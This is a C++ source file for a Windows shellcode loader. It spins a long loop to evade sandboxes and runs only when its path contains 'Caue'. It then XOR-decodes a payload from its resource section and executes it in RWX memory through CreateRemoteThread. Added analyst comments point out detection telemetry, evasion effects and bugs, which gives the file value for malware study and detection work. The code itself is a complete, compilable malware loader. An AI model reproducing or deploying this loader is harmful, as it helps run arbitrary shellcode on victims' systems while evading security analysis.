// Compile: clang++.exe -O2 -Ob2 -Os -fno-stack-protector -g -Xlinker -pdb:none -Xlinker -subsystem:windows -o Caue.exe Caue.cpp metadata.res -luser32 -lkernel32 -fno-unroll-loops -fno-exceptions -fno-rtti
#include <windows.h>
#include <stdio.h>
#include <iostream>
#include <string>
#include <regex>
#define SHELLCODE_RESOURCE 101
#define MAX_OP 89888996
void shellcode();
using namespace std;
// Program entry point (GUI subsystem, see the compile line at the top of the file).
// Execution is gated twice before shellcode() is ever reached:
//   1. a busy-loop counter must reach MAX_OP (the author labels this sandbox evasion:
//      an emulator that short-circuits or time-limits the loop never takes the branch);
//   2. the executable's own path must contain the substring "Caue".
// Analyst note: a renamed sample therefore does nothing observable, and a sandbox that
// caps CPU time may report it as benign - both are worth keeping in mind when triaging.
// Parameters are the standard WinMain arguments; none of them are read here.
// Always returns 0 regardless of which path was taken.
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    // Simple sanbox evasion
    // NOTE(review): `path` is left uninitialised and the GetModuleFileName return value
    // below is never checked, so on failure the regex runs over indeterminate bytes.
    char path[MAX_PATH];
    int cpt = 0;
    int i = 0;
    // Spin for MAX_OP iterations; the compile flags disable loop unrolling, which keeps
    // the loop in place, but an optimiser may still fold it into a single assignment.
    for (i = 0; i < MAX_OP; i++)
    {
        cpt++;
    }
    if (cpt == MAX_OP)
    {
        GetModuleFileName(NULL, path, MAX_PATH);
        // Matches any path with "Caue" anywhere in it (file name or directory component).
        regex str_expr("(.*)(Caue)(.*)");
        // Check if the file path matches the regular expression pattern
        if (regex_match(path, str_expr))
        {
            shellcode();
        }
    }
    return 0;
}
// Reads an RT_RCDATA resource (id SHELLCODE_RESOURCE) from this module, XOR-decodes it with
// a repeating 4-byte key, and executes it in the current process via the remote-process
// API family (OpenProcess on the caller's own PID, VirtualAllocEx, WriteProcessMemory,
// CreateRemoteThread). Blocks until the created thread exits.
// Detection note: self-targeted OpenProcess(PROCESS_ALL_ACCESS) followed by a
// PAGE_EXECUTE_READWRITE allocation, WriteProcessMemory and CreateRemoteThread is a
// well-known telemetry pattern; the encoded payload itself lives in the resource section.
// No return value, and none of the Win32 calls below have their results checked.
void shellcode() {
    // Load shellcode from resources
    // NOTE(review): FindResource/LoadResource/LockResource may return NULL; nothing here
    // guards against that, so a missing resource leads to a zero-length copy from NULL.
    HRSRC shellcodeResource = FindResource(NULL, MAKEINTRESOURCE(SHELLCODE_RESOURCE), RT_RCDATA);
    HGLOBAL shellcodeResourceData = LoadResource(NULL, shellcodeResource);
    DWORD shellcodeSize = SizeofResource(NULL, shellcodeResource);
    // Copy the shellcode to a modifiable buffer
    // Resource memory is read-only, hence the heap copy before decoding in place.
    char* dataCopy = new char[shellcodeSize];
    memcpy(dataCopy, LockResource(shellcodeResourceData), shellcodeSize);
    // XOR Decrypt the shellcode
    // sizeof(key) - 1 excludes the terminating NUL, so the key period is 4 bytes.
    char key[] = "ABCD";
    int j = 0;
    // `i` is signed while shellcodeSize is a DWORD: a sign/unsigned comparison.
    for (int i = 0; i < shellcodeSize; i++)
    {
        if (j == sizeof(key) - 1) j = 0;
        dataCopy[i] = dataCopy[i] ^ key[j];
        j++;
    }
    // Get the ID of the current process
    DWORD pnameid = GetCurrentProcessId();
    // Open the current process with all access rights
    HANDLE processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pnameid);
    // Allocate memory the size of the shellcode
    // RWX in one step rather than RW followed by a protection change.
    PVOID remoteBuffer = VirtualAllocEx(processHandle, NULL, shellcodeSize, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
    // Write the shellcode to the remote buffer
    WriteProcessMemory(processHandle, remoteBuffer, dataCopy, shellcodeSize, NULL);
    // Create a remote thread
    // Cast of the buffer to a thread start routine; nothing validates remoteBuffer is non-NULL.
    HANDLE remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
    // Cleanup
    // The heap copy can be freed here because the bytes already live in remoteBuffer.
    // remoteThread is waited on but never closed - a handle leak until process exit.
    CloseHandle(processHandle);
    delete[] dataCopy;
    WaitForSingleObject(remoteThread, INFINITE);
}